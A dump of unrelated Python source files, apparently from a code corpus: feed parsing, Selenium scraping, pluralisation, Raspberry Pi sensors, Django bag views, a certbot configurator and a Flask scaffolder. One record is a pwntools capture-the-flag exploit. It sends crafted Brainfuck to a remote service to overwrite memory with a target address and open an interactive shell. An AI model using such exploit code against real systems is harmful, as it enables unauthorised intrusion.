from variables import get_variable_value_cascaded,expand_string_variables,safe_parse_split
def check_for_new_links(feed):
    """Given the normal feed object, return a list of new feed entries. Ordered oldest to newest."""
    # read the feed
    feed_url = feed["feed_url"]
    feed_data = feedparser.parse(feed_url)
    # parse out entries in the feed for the information we want
    entries = []
    for entry in feed_data.entries:
        parsed_entry = {
            "title": entry["title"],
            "link": entry["link"],
            "published": entry["published"],
            "feed_url": feed_url,
        }
        entries.append(parsed_entry)
    # keep only entries newer than the last seen link (feeds list newest first)
    if "last_seen_link" in feed:
        last_link = feed["last_seen_link"]
        # BUG FIX: the original defaulted idx to -1, so when the last seen
        # link was missing from the feed, entries[:-1] silently dropped the
        # oldest visible entry. Default to len(entries): everything is new.
        idx = len(entries)
        for cidx in range(len(entries)):
            if entries[cidx]["link"] == last_link:
                idx = cidx
                break
        entries = entries[:idx]
    return list(reversed(entries))
def check_if_feed_marked_for_deletion(defaults, group, feed):
    """Return True when the feed's `remove_feed_if_equal` condition holds.

    The condition is a string "LHS RHS"; both sides are variable-expanded
    and compared for equality. Any missing/invalid condition means False.
    """
    equality_condition = None
    try:
        # BUG FIX: the variable was spelled `equaltiy_condition` here but
        # `equality_condition` below, so the NameError was swallowed by the
        # broad except and this function could never return True.
        equality_condition = get_variable_value_cascaded(defaults, group, feed, {}, "remove_feed_if_equal", print=False)
    except Exception:
        return False  # no condition specified to delete things
    try:
        args = safe_parse_split(equality_condition, " ")
        if len(args) != 2:
            return False  # bad format for the equality condition
        args[0] = expand_string_variables(defaults, group, feed, {}, args[0])
        args[1] = expand_string_variables(defaults, group, feed, {}, args[1])
        if args[0] == args[1]:
            return True
    except Exception as e:
        print(e)  # best-effort: a malformed condition never deletes a feed
    return False  # not ready to be removed
|
15,971 | 8917e9761208c9138707a265d5d2c8c715db6895 | from pwn import *
p=remote('shell.actf.co',19010)
#p=process('./o')
def do_write(n):
    """Emit Brainfuck code that writes the low 3 bytes of `n` into memory.

    Each byte b is produced as floor(sqrt(b))^2 via a multiplication loop
    plus a remainder of '+'s, which keeps the payload short; two trailing
    cells are zeroed afterwards.
    """
    parts = []
    for byte_idx in range(3):
        byte = (n >> (byte_idx * 8)) & 0xff
        root = int(byte ** 0.5)
        parts.append('+' * (byte - root * root) + '>')
        parts.append('[-]' + '+' * root)
        parts.append('[<' + '+' * root + '>-]')
    # clean the two scratch cells
    parts.extend('>[-]' for _ in range(2))
    return ''.join(parts)
p.recvuntil('code: ')
code = '+[>+]'
code += '>'*0x28
code += '[-]'
code += do_write(0x4011c6)
print len(code)
p.sendline(code)
p.interactive()
|
15,972 | 867661597d32e503e5acdbddb3ad54d7c885fff2 | # -------------
# This module delivers helper functions
# to get a driver instance for the chrome webdriver
# make sure the path to the webdriver is right
# -------------
import time
from datetime import datetime
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import settings
import helpers
def get_driver_options():
    """
    Returns default driver options
    this function is used by the
    get_driver_with_options function only.
    """
    # Define Browser Options
    chrome_options = Options()
    chrome_options.add_argument("--headless")  # Hides the browser window
    # Force English pages so downstream text/date parsing is locale-stable
    chrome_options.add_experimental_option('prefs', {'intl.accept_languages': 'en,en_US'})
    return chrome_options
def get_driver_with_options():
    """
    Returns a driver object of the chrome
    web driver. This can be used for crawling.
    """
    # NOTE(review): headless options are currently disabled — the browser
    # window will be visible; re-enable the two lines below to hide it.
    #options = get_driver_options()
    #return webdriver.Chrome(options=options)
    return webdriver.Chrome()
def close_driver(driver):
    """
    Closes the webcrawler object which is
    passed to the function as argument.
    Argument:
    driver -- chrome webdriver object
    """
    # close() shuts the current window only; use driver.quit() to end the
    # whole session if stray processes are observed — TODO confirm desired.
    driver.close()
def click_button_xpath(driver, platform):
    """
    Clicks the "show more" button when scrolling down the review page of a play store app
    Tested yet with review pages only.
    Argument:
    driver -- the selenium driver holding the current session
    platform -- key into settings.platforms selecting the button xpath
    """
    xpath = settings.platforms[platform]['search_listings']['show_more_xpath']
    time.sleep(1)  # give the page a moment to render the button
    # will raise IndexError if the xpath matches nothing — assumed present
    show_more_button = driver.find_elements_by_xpath(xpath)[0]
    # JS click avoids "element not interactable" when the button is off-screen
    driver.execute_script("arguments[0].click();", show_more_button)
def scroll_down_page(driver):
    """Scroll to the page bottom twice (with a pause for lazy-loaded
    content) and return the resulting document height in pixels."""
    # Scroll down to the bottom.
    driver.execute_script("window.scrollTo(0,document.body.scrollHeight);")
    # Wait to load the page
    time.sleep(1)
    # Scroll down again if bottom changed.
    driver.execute_script("window.scrollTo(0,document.body.scrollHeight);")
    # Calculate new scroll height and compare with last height.
    return driver.execute_script("return document.body.scrollHeight")
def is_date_reached(driver, platform):
    """Return True when the newest visible listing date is at or before the
    platform's configured reference date, False otherwise.

    Returns None when the platform config uses an unsupported search method.
    Raises ValueError if no candidate element parses as a date, and
    LookupError when too few elements match the query at all.
    """
    search_by = settings.platforms[platform]['search_listings']['search_by']
    search_query = settings.platforms[platform]['search_listings']['search_query']
    element_positions = settings.platforms[platform]['search_listings']['element_positions']
    date_format = settings.platforms[platform]['search_listings']['date_format']
    reference_date = settings.platforms[platform]['search_listings']['reference_date']
    reference_date = datetime.strptime(reference_date, '%Y-%m-%d')
    date = None
    if search_by == 'class':
        elements = driver.find_elements_by_class_name(search_query)
    else:
        return None  # only class-name lookup is supported so far
    if len(elements) >= 2:
        # try the configured positions until one parses as a date
        for pos in element_positions:
            try:
                text = str(elements[pos].text).strip()
                date = datetime.strptime(text, date_format)
                break
            except ValueError as e:
                helpers.log('Can not generate date from {} and format {} at pos {}'.format(text, date_format, pos))
        if not date:
            raise ValueError('Can not generate any date')
        if date <= reference_date:
            return True
        else:
            return False
    else:
        # BUG FIX: '.format()' was called with no argument, which raises
        # IndexError instead of the intended LookupError message.
        raise LookupError('No elements found using {}'.format(search_query))
def scroll_down_till_limit(driver, platform):
    """
    Scrolls down a webpage x_times times. Clicking button button when scrolled down if
    specified.
    Arguments:
    driver -- chrome selenium driver of current session
    platform -- key into settings.platforms with scrolling/date config
    Returns:
    driver -- the webdriver at the final state
    """
    # Scroll page to load whole content
    last_height = 0
    while True:
        new_height = scroll_down_page(driver)
        # if no more scrolling possible
        if new_height == last_height:
            break
        # if specified point in past reached
        if is_date_reached(driver, platform):
            break
        last_height = new_height
        # load the next batch of listings before the next scroll pass
        click_button_xpath(driver, platform)
    return driver
|
15,973 | 2bc1a6147d59bd82d941c13bd47187618bac53ab | #Create list of exceptions
#sample from https://www.thoughtco.com/irregular-plural-nouns-in-english-1692634
#utimately, this should read a file
exceptionList = {
"addendum":"Addenda",
"aircraft":"Aircraft",
"alumna":"Alumnae",
"alumnus":"Alumni",
"analysis":"Analyses",
"antenna":"Antennae",
"antithesis":"antitheses",
"apex":"Apices",
"appendix":"Appendices",
"axis":"Axes",
"bacillus":"Bacilli",
"bacterium":"Bacteria",
"basis":"Bases",
"beau":"Beaux",
"bison":"Bison",
"bureau":"Bureaux",
"cactus":"Cacti",
"château":"Châteaux",
"child":"Children",
"codex":"Codices",
"concerto":"Concerti",
"corpus":"Corpora",
"crisis":"Crises",
"criterion":"Criteria",
"curriculum":"Curricula",
}
# Final letters that take an "-es" plural.
# NOTE(review): bare 'h' over-matches — only "ch"/"sh" endings take "-es"
# ("path" -> "pathes" is wrong); confirm intended behavior.
considerLastLetter = ['s','h','x','z','o']
# Consonants that are unproblematic in final position (currently unused).
noProblemConsonantsList = ['q','w','r','t','p','d','g','j','k','l','v','b','n','m']
# Vowels, used for the final-"y" rule ("day" -> "days" vs "city" -> "cities").
vowelsList = ['e','u','i','o','a']
# grab user input
singWord = input("Enter a word in the singular: ")
if singWord in exceptionList.keys():
    plurWord = exceptionList[singWord]
# words like "fix", "pass", "path"
elif singWord[-1] in considerLastLetter:
    plurWord = singWord+'es'
# words like wolf
elif singWord[-1] == 'f':
    plurWord = singWord[:len(singWord)-1]+'ves'
# words like "wife"
elif singWord[-2:] == 'fe':
    plurWord = singWord[:len(singWord) - 2] + 'ves'
# consonant + "y" -> "-ies" (words like "city")
elif singWord[-1] == 'y' and singWord[-2] not in vowelsList:
    plurWord = singWord[:len(singWord)-1]+'ies'
# default regular plural
else:
    plurWord = singWord + "s"
print(plurWord)
|
15,974 | 0da02ccb0148cd68dd11e931a6987b0069c08eba |
"""
Component which holds data about a sprite.
"""
class RenderComponent:
    """Component which holds data about a sprite for an entity."""

    def __init__(self, sprite):
        """Store the drawable.

        *sprite* is expected to be a pygame.image (Surface) object;
        this is not enforced here.
        """
        self.sprite = sprite

    def __repr__(self):
        # Aid debugging: show which sprite object this component wraps.
        return f"{type(self).__name__}(sprite={self.sprite!r})"
15,975 | 4b7a574904900d4fa2b703e683aa0da61418d900 | import RPi.GPIO as GPIO
import time
import board
import busio
import digitalio
import adafruit_bmp280
AO_pin = 0
SPICLK = 21
SPIMISO = 19
SPIMOSI = 20
SPICS = 8
def init():
    """Configure the Raspberry Pi GPIO pins used for bit-banged SPI."""
    GPIO.setwarnings(False)
    GPIO.setmode(GPIO.BCM)  # Broadcom pin numbering
    GPIO.setup(SPIMOSI, GPIO.OUT)
    GPIO.setup(SPIMISO, GPIO.IN)
    GPIO.setup(SPICLK, GPIO.OUT)
    GPIO.setup(SPICS, GPIO.OUT)
    # (removed a stray trailing `pass` -- it had no effect)
def readadc(adcnum, clockpin, mosipin, misopin, cspin):
    """Bit-bang one conversion from an SPI ADC channel.

    Returns the converted sample, or -1 for an invalid channel number.
    NOTE(review): the framing (0x18 start/single-ended bits, 5 command
    clocks, 12 read clocks with the first bit dropped) looks like the
    usual MCP3xxx recipe -- confirm against the actual ADC part.
    """
    # Only channels 0-7 exist.
    if ((adcnum > 7) or (adcnum < 0)):
        return -1
    # Reset the bus: CS high, clock low, then assert CS to start a frame.
    GPIO.output(cspin, True)
    GPIO.output(clockpin, False)
    GPIO.output(cspin, False)
    commandout = adcnum
    commandout |= 0x18  # start bit + single-ended mode
    commandout <<= 3    # left-align so the 5 significant bits sit at bit 7
    for i in range(5):
        # Shift the command out MSB-first, one bit per clock pulse.
        if (commandout & 0x80):
            GPIO.output(mosipin, True)
        else:
            GPIO.output(mosipin, False)
        commandout <<= 1
        GPIO.output(clockpin, True)
        GPIO.output(clockpin, False)
    adcout = 0
    # Clock in 12 bits from the ADC.
    for i in range(12):
        GPIO.output(clockpin, True)
        GPIO.output(clockpin, False)
        adcout <<= 1
        if (GPIO.input(misopin)):
            adcout |= 0x1
    GPIO.output(cspin, True)
    adcout >>= 1  # drop the first (null) bit
    return adcout
def main():
    """Sample the analog channel and the BMP280 sensor every 2 seconds,
    printing voltage, temperature, pressure and altitude."""
    init()
    time.sleep(2)
    # Create the hardware SPI bus and the BMP280 driver ONCE; the original
    # re-created them on every loop iteration, allocating a new bus/chip-select
    # object every 2 seconds for no benefit.
    spi = busio.SPI(board.SCK, MOSI=board.MOSI, MISO=board.MISO)
    cs = digitalio.DigitalInOut(board.CE1)
    sensor = adafruit_bmp280.Adafruit_BMP280_SPI(spi, cs)
    while True:
        ad_value = readadc(AO_pin, SPICLK, SPIMOSI, SPIMISO, SPICS)
        # 10-bit ADC count -> volts at the pin, scaled by the 5x divider.
        voltage0 = ad_value * (3.3 / 1024) * 5
        # NOTE(review): fixed 8.5 V offset -- presumably a calibration
        # constant for this rig; confirm.
        voltage = 8.5 + voltage0
        print(" Voltage is: " + str("%.2f" % voltage) + "V")
        print('Temperature: {} degrees C'.format(sensor.temperature))
        print('Pressure: {}hPa'.format(sensor.pressure))
        print('altitude: {}m'.format(sensor.altitude))
        time.sleep(2)
if __name__ =='__main__':
    try:
        main()
    except KeyboardInterrupt:
        # Exit cleanly on Ctrl-C instead of printing a traceback.
        pass
15,976 | a76b352f72c8b715bf17cf678a4d0bd263b049ee | # def func():
# def func2():
# print('this is func2')
# return func2
#
#
# f = func()
# f()
#
# def f1(x):
# print(x)
# return 123
#
#
# def f2():
# ret = f1('s')
# print(ret)
#
#
# f2()
#
# def func():
# def func2():
# return 'a'
# return func2
#
# func2 = func()
# print(func2)
# Closures (闭包): functions that capture variables from their enclosing scope
#
# def func():
# x=20
# def inner():
# print(x)
# return inner
#
#
# he = func()
# he()
#
# If __closure__ prints as None, the function is not a closure.
# If __closure__ contains cell elements, the function is a closure.
# def func():
# name = 'hanlei'
# def inner():
# print(name)
# print(inner.__closure__)
# return inner
#
# f = func()
# f()
#
# name = 'hanlei3'
# def func1():
# def inner1():
# print(name)
# print(inner1.__closure__)
# return inner1()
#
# f1 = func1()
#
from urllib.request import urlopen
def index(url):
    """Fetch *url* and return the raw response body as bytes.

    NOTE(review): despite the closure examples above, this returns
    inner() *called* -- i.e. the downloaded content, not the inner
    function itself.
    """
    def inner():
        return urlopen(url).read()
    return inner()
# Runs a live network request at import time.
u = 'http://www.cnblogs.com/Eva-J/articles/7156261.html#_label1'
get = index(u)
print(get)
|
15,977 | 17acab7d4d2ccda31dc52af8d41788cf8f2dba58 | from django.shortcuts import (render, redirect, reverse,
HttpResponse, get_object_or_404)
from django.contrib import messages
from shop.models import Product
from django.contrib.auth.decorators import login_required
@login_required
def shopping_bag(request):
    """
    Returns Shopping Bag

    Renders the shopping bag page; requires an authenticated user.
    """
    return render(request, 'shopping_bag/shopping_bag.html')
def add_to_bag(request, item_id):
    """
    Submit form to view
    defines quantity of product added to shopping bag

    POST params: 'quantity' (required int), 'redirect_url' (required),
    'product_select' (optional size/option key).

    NOTE(review): unlike the sibling bag views, this one is NOT decorated
    with @login_required -- confirm whether anonymous users should be able
    to add items. Also, a missing/non-numeric 'quantity' raises here.
    """
    product = get_object_or_404(Product, pk=item_id)
    # Get quantity of item and add to current bag
    quantity = int(request.POST.get('quantity'))
    redirect_url = request.POST.get('redirect_url')
    # get products
    select = None
    if 'product_select' in request.POST:
        select = request.POST['product_select']
    # Bag lives in the session as {item_id: {'items_by_select': {select: qty}}}
    current_bag = request.session.get('current_bag', {})
    if item_id in list(current_bag.keys()):
        # if item is currently in bag
        if select in current_bag[item_id]['items_by_select'].keys():
            # if item is same size/time, increment quantity
            current_bag[item_id]['items_by_select'][select] += quantity
            messages.success(
                request,
                f'{product.name} qty updated')
        else:
            # if item is different size/time, add new item
            current_bag[item_id]['items_by_select'][select] = quantity
            messages.success(request, f'Added {product.name} to bag')
    else:
        # if not currently in bag, add new item
        current_bag[item_id] = {'items_by_select': {select: quantity}}
        messages.success(request, f'Added {product.name} to bag')
    # override session variable with update
    request.session['current_bag'] = current_bag
    return redirect(redirect_url)
@login_required
def update_bag(request, item_id):
    """
    Handle the bag-update form: set a new quantity for one size/option
    variant of an item already held in the session bag, then return to
    the bag page.
    """
    product = get_object_or_404(Product, pk=item_id)
    new_qty = int(request.POST.get('quantity'))
    # Which size/option variant is being updated; None when the product
    # has no selectable options.
    variant = None
    if 'product_select_id' in request.POST:
        variant = request.POST['product_select_id']
    bag = request.session.get('current_bag', {})
    if new_qty > 0:
        bag[item_id]['items_by_select'][variant] = new_qty
        messages.success(
            request,
            f'{product.name} qty updated')
    # Write the (possibly unchanged) bag back into the session.
    request.session['current_bag'] = bag
    return redirect(reverse('shopping_bag'))
@login_required
def remove_from_bag(request, item_id):
    """
    Submit remove form to view to remove item from shopping bag

    Deletes one size/option variant of the item from the session bag;
    when the item has no variants left, the item itself is removed.
    Responds with HTTP 200 on success, 500 on any failure (presumably
    consumed by client-side script -- confirm against the template JS).
    """
    try:
        product = get_object_or_404(Product, pk=item_id)
        # get products
        select = None
        if 'product_select' in request.POST:
            select = request.POST['product_select']
        current_bag = request.session.get('current_bag', {})
        del current_bag[item_id]['items_by_select'][select]
        # Drop the item entirely once no variant entries remain.
        if not current_bag[item_id]['items_by_select']:
            current_bag.pop(item_id)
        messages.success(request, f'{product.name} removed from bag')
        request.session['current_bag'] = current_bag
        return HttpResponse(status=200)
    except Exception as e:
        # Broad catch is deliberate here: any failure is surfaced to the
        # caller as a 500 plus a user-facing message rather than a crash.
        messages.error(request, f'Error removing item: {e}')
        return HttpResponse(status=500)
|
15,978 | d283fe3b93bebb5bd27eb4e0d49ef6674e8aa664 | """ Distribution specific override class for CentOS family (RHEL, Fedora) """
import logging
from typing import Any
from certbot import errors
from certbot import util
from certbot_apache._internal import apache_util
from certbot_apache._internal import configurator
from certbot_apache._internal import parser
from certbot_apache._internal.configurator import OsOptions
logger = logging.getLogger(__name__)
class CentOSConfigurator(configurator.ApacheConfigurator):
    """CentOS specific ApacheConfigurator override class"""

    # Default layout/commands for RHEL-family Apache ("httpd") installs.
    OS_DEFAULTS = OsOptions(
        server_root="/etc/httpd",
        vhost_root="/etc/httpd/conf.d",
        vhost_files="*.conf",
        logs_root="/var/log/httpd",
        ctl="apachectl",
        apache_bin="httpd",
        version_cmd=['apachectl', '-v'],
        restart_cmd=['apachectl', 'graceful'],
        restart_cmd_alt=['apachectl', 'restart'],
        conftest_cmd=['apachectl', 'configtest'],
        challenge_location="/etc/httpd/conf.d",
    )

    def config_test(self) -> None:
        """
        Override config_test to mitigate configtest error in vanilla installation
        of mod_ssl in Fedora. The error is caused by non-existent self-signed
        certificates referenced by the configuration, that would be autogenerated
        during the first (re)start of httpd.
        """
        os_info = util.get_os_info()
        fedora = os_info[0].lower() == "fedora"
        try:
            super().config_test()
        except errors.MisconfigurationError:
            # Only Fedora gets the restart workaround; elsewhere the
            # misconfiguration is a real error and is re-raised.
            if fedora:
                self._try_restart_fedora()
            else:
                raise

    def _rhel9_or_newer(self) -> bool:
        """Return True when running on a RHEL-derived OS of version >= 9."""
        os_name, os_version = util.get_os_info()
        rhel_derived = os_name in [
            "centos", "centos linux",
            "cloudlinux",
            "ol", "oracle",
            "rhel", "redhatenterpriseserver", "red hat enterprise linux server",
            "scientific", "scientific linux",
        ]
        # It is important that the loose version comparison below is not made
        # if the OS is not RHEL derived. See
        # https://github.com/certbot/certbot/issues/9481.
        if not rhel_derived:
            return False
        at_least_v9 = util.parse_loose_version(os_version) >= util.parse_loose_version('9')
        return at_least_v9

    def _override_cmds(self) -> None:
        """Swap apachectl for the httpd binary on RHEL 9+ query commands."""
        super()._override_cmds()
        # As of RHEL 9, apachectl can't be passed flags like "-v" or "-t -D", so
        # instead use options.bin (i.e. httpd) for version_cmd and the various
        # get_X commands
        if self._rhel9_or_newer():
            if not self.options.bin:
                raise ValueError("OS option apache_bin must be set for CentOS") # pragma: no cover
            self.options.version_cmd[0] = self.options.bin
            self.options.get_modules_cmd[0] = self.options.bin
            self.options.get_includes_cmd[0] = self.options.bin
            self.options.get_defines_cmd[0] = self.options.bin
            if not self.options.restart_cmd_alt: # pragma: no cover
                raise ValueError("OS option restart_cmd_alt must be set for CentOS.")
            self.options.restart_cmd_alt[0] = self.options.ctl

    def _try_restart_fedora(self) -> None:
        """
        Tries to restart httpd using systemctl to generate the self signed key pair.
        """
        try:
            util.run_script(['systemctl', 'restart', 'httpd'])
        except errors.SubprocessError as err:
            raise errors.MisconfigurationError(str(err))
        # Finish with actual config check to see if systemctl restart helped
        super().config_test()

    def get_parser(self) -> "CentOSParser":
        """Initializes the ApacheParser"""
        return CentOSParser(
            self.options.server_root, self, self.options.vhost_root, self.version)
class CentOSParser(parser.ApacheParser):
    """CentOS specific ApacheParser override class"""

    def __init__(self, *args: Any, **kwargs: Any) -> None:
        # CentOS specific configuration file for Apache
        self.sysconfig_filep: str = "/etc/sysconfig/httpd"
        super().__init__(*args, **kwargs)

    def update_runtime_variables(self) -> None:
        """ Override for update_runtime_variables for custom parsing """
        # Opportunistic, works if SELinux not enforced
        super().update_runtime_variables()
        self.parse_sysconfig_var()

    def parse_sysconfig_var(self) -> None:
        """ Parses Apache CLI options from CentOS configuration file """
        # Each -D define found in the OPTIONS variable becomes a parser variable.
        defines = apache_util.parse_define_file(self.sysconfig_filep, "OPTIONS")
        for k, v in defines.items():
            self.variables[k] = v
|
15,979 | 275fc40622a91046a4a613d830a43264d2a87f36 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import subprocess
import sys
import os
def print_help():
    """Print usage (Chinese): pass a command name (e.g. `mvn`) to reveal
    its location in Windows Explorer."""
    print('''[this py] <cmd>
cmd:命令名称,如:mvn node
示例:
[this py] mvn -> 打开mvn环境变量所在文件夹
''')
def open_path_in_explore(path):
    """Open *path* as a folder in Windows Explorer (Windows-only; shells out)."""
    os.system("explorer.exe \"{}\"".format(path))
def locate_file_in_explore(file):
    """Open Windows Explorer with *file* pre-selected (Windows-only)."""
    os.system("explorer.exe /select, \"{}\"".format(file))
def print_no_newline(text):
    """Write *text* to stdout without a trailing newline and flush.

    The parameter was renamed from ``str`` to stop shadowing the builtin;
    every call site in this script passes it positionally.
    """
    sys.stdout.write(text)
    sys.stdout.flush()
def read_a_num():
    """Read one integer from stdin; return -1 on invalid or exhausted input.

    Catches only the exceptions input()/int() raise for bad input
    (ValueError) or closed stdin (EOFError). The original bare ``except``
    also swallowed KeyboardInterrupt/SystemExit, making Ctrl-C look like
    an invalid number.
    """
    try:
        return int(input())
    except (ValueError, EOFError):
        return -1
def open_file_by_num(files, num):
    """Reveal files[num - 1] in Explorer.

    Returns True when *num* is a valid 1-based index; otherwise prints an
    'invalid num:' prompt (no newline) and returns False.
    """
    in_range = 0 < num <= len(files)
    if in_range:
        locate_file_in_explore(files[num - 1])
        return True
    print_no_newline('invalid num:')
    return False
def handle(cmd):
    """Run ``where <cmd>``, list every match, and let the user pick one to
    reveal in Explorer.

    Windows-specific: command output is decoded as GBK (Chinese-locale
    codepage).
    """
    cmd = "where \"{}\"".format(cmd)
    try:
        output = subprocess.check_output(cmd, shell=False, stderr=subprocess.STDOUT)
        result = output.decode("GBK")
    except subprocess.CalledProcessError as e:
        # Only CalledProcessError carries ``output``. The previous broad
        # ``except Exception`` crashed with AttributeError on e.output for
        # other failures (e.g. FileNotFoundError when `where` is missing);
        # those now propagate with their real message.
        print(e.output.decode("GBK"))
        return
    if len(result) > 0:
        files = result.split("\r\n")
        files = [file for file in files if len(file) > 0]
        if len(files) > 1:
            print("select to open:")
            print('\n'.join((str(index + 1) + '. ' + file) for (index, file) in enumerate(files)))
            print_no_newline('enter num:')
            # Keep prompting until a valid selection is opened.
            while not open_file_by_num(files, read_a_num()):
                pass
        elif len(files) == 1:
            open_file_by_num(files, 1)
if __name__ == '__main__':
    # First CLI argument is the command name to locate with `where`.
    args = sys.argv[1:]
    if len(args) < 1:
        print_help()
    else:
        handle(args[0])
|
15,980 | c88e012a342fe2c512d10f23f2c84e03202f91c6 | ###################################################################
#
###################################################################
import argparse
import os
class AppBuilder:
    """Scaffolds a minimal Flask project on disk.

    The constructor creates the directory tree and baseline files; the
    add*Support methods append optional features (WTForms, SQLAlchemy),
    and finalizeApp() writes the app package's __init__.py last.
    """

    def __init__(self, name):
        """Create the project skeleton in ./<name>.

        Raises FileExistsError (from os.mkdir) if the directory exists.
        """
        # supported features
        self.sp_database = False
        self.sp_logging = False # TODO: implement logging
        self.sp_wtf = False
        # directories path
        self.path_for_root = os.path.join('.', name)
        self.path_for_app = os.path.join(self.path_for_root, 'app')
        self.path_for_cfg = os.path.join(self.path_for_root, 'config.py')
        self.path_for_vws = os.path.join(self.path_for_app, 'views.py')
        # create the root directory for the app
        os.mkdir(self.path_for_root)
        # add directory for temporary files (logs)
        os.mkdir(os.path.join(self.path_for_root, 'tmp'))
        # add actual app directories
        os.mkdir(self.path_for_app)
        os.mkdir(os.path.join(self.path_for_app, 'static'))
        os.mkdir(os.path.join(self.path_for_app, 'templates'))
        # add file to run app locally
        with open(os.path.join(self.path_for_root, 'run.py'), 'w') as run_file:
            run_file.write('from app import app\n')
            run_file.write('\n')
            run_file.write('app.run(debug = False)')
        # add configuration file
        with open(self.path_for_cfg, 'w') as cfg_file:
            cfg_file.write('import os\n')
            cfg_file.write('\n')
            cfg_file.write('basedir = os.path.abspath(os.path.dirname(__file__))\n')
            cfg_file.write('\n')
        # add test set up file
        with open(os.path.join(self.path_for_root, 'test.py'), 'w') as tst_file:
            tst_file.write('import os\n')
            tst_file.write('import unittest\n')
            tst_file.write('from datetime import datetime, timedelta\n')
            tst_file.write('from config import basedir\n')
            tst_file.write('\n')
        # add basic views file to complete
        with open(self.path_for_vws, 'w') as view_file:
            view_file.write('from flask import render_template, flash, redirect, url_for, session, request, g\n')
        # add base html template
        with open(os.path.join(self.path_for_app, 'templates/base.html'), 'w') as base_file:
            base_file.write('<!DOCTYPE html>\n')
            base_file.write('<html lang="en">\n')
            base_file.write('\n')
            base_file.write('\t<head>\n')
            base_file.write('\t\t<meta charset="utf-8" />\n')
            base_file.write('\t\t<meta http-equiv="X-UA-Compatible" content="IE=edge" />\n')
            base_file.write('\t\t<!-- <meta name="viewport" content="width=device-width, initial-scale=1" /> for responsiveness -->\n')
            base_file.write('\t\t<title>Place Title in Here</title>\n')
            base_file.write('\t\t<!-- add a favicon from static directory (16x16px png) -->\n')
            base_file.write('\t\t<!-- <link rel="shortcut icon" href="{}" /> -->\n'.format("{{ url_for('static', filename='favicon.ico') }}"))
            base_file.write('\t\t<!-- links to css and javascript libraries to place below -->\n')
            base_file.write('\t</head>\n')
            base_file.write('\n')
            base_file.write('\t<body>\n')
            base_file.write('\t\t{% block content %}{% endblock %}\n')
            base_file.write('\t</body>\n')
            base_file.write('\n')
            base_file.write('</html>\n')

    def addFormSupport(self, fields = None, validators = None):
        """Enable Flask-WTF: append CSRF config and generate app/forms.py.

        fields/validators are lists of wtforms names to import explicitly;
        when None, a star import is generated instead.
        """
        self.sp_wtf = True
        with open(self.path_for_cfg, 'a') as cfg_file:
            cfg_file.write('# Support for forms added:\n')
            cfg_file.write('WTF_CSRF_ENABLED = True\n')
            cfg_file.write('SECRET_KEY = "SOMETHING_HARD_TO_GUESS"\n')
            cfg_file.write('\n')
        with open(os.path.join(self.path_for_app, 'forms.py'), 'w') as form_file:
            form_file.write('from flask_wtf import Form\n')
            if fields is not None:
                form_file.write('from wtforms import {}\n'.format(', '.join(fields)))
            else:
                form_file.write('from wtforms import *\n')
            if validators is not None:
                form_file.write('from wtforms.validators import {}\n'.format(', '.join(validators)))
            else:
                form_file.write('from wtforms.validators import *\n')
        with open(self.path_for_vws, 'a') as view_file:
            view_file.write('from .forms import *\n')

    def addDatabaseSupport(self):
        """Enable SQLAlchemy + sqlalchemy-migrate: append DB config and
        generate app/models.py plus the db_create/migrate/downgrade/upgrade
        helper scripts."""
        self.sp_database = True
        with open(self.path_for_cfg, 'a') as cfg_file:
            cfg_file.write('# Support for database added:\n')
            cfg_file.write("SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')\n")
            cfg_file.write("SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')\n")
            cfg_file.write('\n')
        with open(os.path.join(self.path_for_app, 'models.py'), 'w') as mod_file:
            mod_file.write('from app import db\n')
            mod_file.write('from app import app\n')
            mod_file.write('import sys\n')
        with open(self.path_for_vws, 'a') as view_file:
            view_file.write('from .models import *\n')
        # create db script:
        with open(os.path.join(self.path_for_root, 'db_create.py'), 'w') as script_db:
            script_db.write('# Inspired by Miguel Grinberg\'s Flask Mega Tutorial.\n')
            script_db.write('# Check it out at https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world')
            script_db.write('\n\n')
            script_db.write('from migrate.versioning import api\n')
            script_db.write('from config import SQLALCHEMY_DATABASE_URI\n')
            script_db.write('from config import SQLALCHEMY_MIGRATE_REPO\n')
            script_db.write('from app import db\n')
            script_db.write('import os.path\n')
            script_db.write('\n')
            script_db.write('db.create_all()\n')
            script_db.write('if not os.path.exists(SQLALCHEMY_MIGRATE_REPO):\n')
            script_db.write("\tapi.create(SQLALCHEMY_MIGRATE_REPO, 'database repository')\n")
            script_db.write('\tapi.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
            script_db.write('else:\n')
            script_db.write('\tapi.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, api.version(SQLALCHEMY_MIGRATE_REPO))\n')
        with open(os.path.join(self.path_for_root, 'db_migrate.py'), 'w') as script_mg:
            script_mg.write('# Inspired by Miguel Grinberg\'s Flask Mega Tutorial.\n')
            script_mg.write('# Check it out at https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world')
            script_mg.write('\n\n')
            script_mg.write('import imp\n')
            script_mg.write('from migrate.versioning import api\n')
            script_mg.write('from app import db\n')
            script_mg.write('from config import SQLALCHEMY_DATABASE_URI\n')
            script_mg.write('from config import SQLALCHEMY_MIGRATE_REPO\n')
            script_mg.write('\n')
            script_mg.write('v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
            script_mg.write("migration = SQLALCHEMY_MIGRATE_REPO + '/versions/{:03d}_migration.py'.format(v + 1)\n")
            script_mg.write("tmp_module = imp.new_module('old_model')\n")
            script_mg.write('old_model = api.create_model(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
            script_mg.write('exec(old_model, tmp_module.__dict__)\n')
            script_mg.write('script = api.make_update_script_for_model(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, tmp_module.meta, db.metadata)\n')
            script_mg.write("open(migration, 'wt').write(script)\n")
            script_mg.write('api.upgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
            script_mg.write('v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)\n')
            script_mg.write('\n')
            script_mg.write("print('New migration saved as {}'.format(migration))\n")
            script_mg.write("print('Current database version: {}'.format(v))\n")
        with open(os.path.join(self.path_for_root, 'db_downgrade.py'), 'w') as script_dg:
